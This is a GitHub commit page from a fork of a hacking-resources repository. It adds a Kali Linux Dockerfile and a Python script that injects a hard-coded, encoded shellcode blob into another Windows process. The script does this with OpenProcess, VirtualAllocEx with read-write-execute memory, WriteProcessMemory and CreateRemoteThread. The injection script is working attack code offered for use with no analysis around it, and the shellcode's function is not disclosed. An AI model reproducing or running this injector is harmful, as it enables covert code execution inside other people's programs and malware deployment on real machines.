forked from panagiks/My-Gray-Hacker-Resources
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
bt3
committed
Sep 5, 2015
1 parent
656e5a0
commit 2507cfc
Showing
2 changed files
with
44 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,12 @@ | ||
FROM officialkali/kali | ||
MAINTAINER [email protected] | ||
|
||
RUN echo "deb http:https://http.kali.org/kali sana main contrib non-free" > /etc/apt/sources.list && \ | ||
echo "deb-src http:https://http.kali.org/kali sana main contrib non-free" >> /etc/apt/sources.list && \ | ||
echo "deb http:https://security.kali.org/kali-security sana/updates main contrib non-free" >> /etc/apt/sources.list && \ | ||
echo "deb-src http:https://security.kali.org/kali-security sana/updates main contrib non-free" >> /etc/apt/sources.list | ||
ENV DEBIAN_FRONTEND noninteractive | ||
RUN apt-get -y update && apt-get -y dist-upgrade && apt-get clean | ||
|
||
CMD ["/bin/bash"] | ||
|
32 changes: 32 additions & 0 deletions
32
Vulnerabilities_and_Exploits/Payloads/inject_shellcode_into_remote_process.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
# import ctypes to interact witht eh Windows API | ||
from ctypes import * | ||
|
||
# sets the section of memory that stores shellcode as RWX | ||
page_rwx_value = 0x40 | ||
|
||
# all possible rights | ||
process_all = 0x1F0FFF | ||
|
||
# allocate memory, ensure it is zeroed for writting to memory | ||
memcommit = 0x00001000 | ||
|
||
# stores the available calls from windll.kernel32 | ||
kernel32_variable = windll.kernel32 | ||
|
||
shellcode = "\xbb\xbb\x48\x30\x8d\xdb\xdd\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x47\x83\xe8\xfc\x31\x58\x0f\x03\x58\xb4\xaa\xc5\x71\x22\xa8\x26\x8a\xb2\xcd\xaf\x6f\x83\xcd\xd4\xe4\xb3\xfd\x9f\xa9\x3f\x75\xcd\x59\xb4\xfb\xda\x6e\x7d\xb1\x3c\x40\x7e\xea\x7d\xc3\xfc\xf1\x51\x23\x3d\x3a\xa4\x22\x7a\x27\x45\x76\xd3\x23\xf8\x67\x50\x79\xc1\x0c\x2a\x6f\x41\xf0\xfa\x8e\x60\xa7\x71\xc9\xa2\x49\x56\x61\xeb\x51\xbb\x4c\xa5\xea\x0f\x3a\x34\x3b\x5e\xc3\x9b\x02\x6f\x36\xe5\x43\x57\xa9\x90\xbd\xa4\x54\xa3\x79\xd7\x82\x26\x9a\x7f\x40\x90\x46\x7e\x85\x47\x0c\x8c\x62\x03\x4a\x90\x75\xc0\xe0\xac\xfe\xe7\x26\x25\x44\xcc\xe2\x6e\x1e\x6d\xb2\xca\xf1\x92\xa4\xb5\xae\x36\xae\x5b\xba\x4a\xed\x33\x0f\x67\x0e\xc3\x07\xf0\x7d\xf1\x88\xaa\xe9\xb9\x41\x75\xed\xbe\x7b\xc1\x61\x41\x84\x32\xab\x85\xd0\x62\xc3\x2c\x59\xe9\x13\xd1\x8c\xbe\x43\x7d\x7f\x7f\x34\x3d\x2f\x17\x5e\xb2\x10\x07\x61\x19\x39\xa2\x9b\xc9\x86\x9b\x9b\x96\x6f\xde\xe3\x89\x8c\x57\x05\xa3\x42\x3e\x9d\x5b\xfa\x1b\x55\xfa\x03\xb6\x13\x3c\x8f\x35\xe3\xf2\x78\x33\xf7\x62\x89\x0e\xa5\x24\x96\xa4\xc0\xc8\x02\x43\x43\x9f\xba\x49\xb2\xd7\x64\xb1\x91\x6c\xac\x27\x5a\x1a\xd1\xa7\x5a\xda\x87\xad\x5a\xb2\x7f\x96\x08\xa7\x7f\x03\x3d\x74\xea\xac\x14\x29\xbd\xc4\x9a\x14\x89\x4a\x64\x73\x0b\xb6\xb3\xbd\x79\xd6\x07" | ||
|
||
# process ID that the shellcode will be injected into | ||
process_id = 1234 | ||
shellcode_length = len(shellcode) | ||
|
||
# makes a call to OpenProcess | ||
process_handle = kernel32_variable.OpenProcess(process_all, False, process_id) | ||
|
||
# calls VirtualAllocEx, function that allocates memory in remote process | ||
memory_allocation_variable = kernel32_variable.VirtualAllocEx(process_handle, 0, shellcode_length, memcommit, page_rwx_value) | ||
|
||
# writes shellcode to the are of memory within the process | ||
kernel32_variable.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, shellcode_length, 0) | ||
|
||
# creates thread within the another process | ||
kernel32_variable.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, 0, 0, 0) |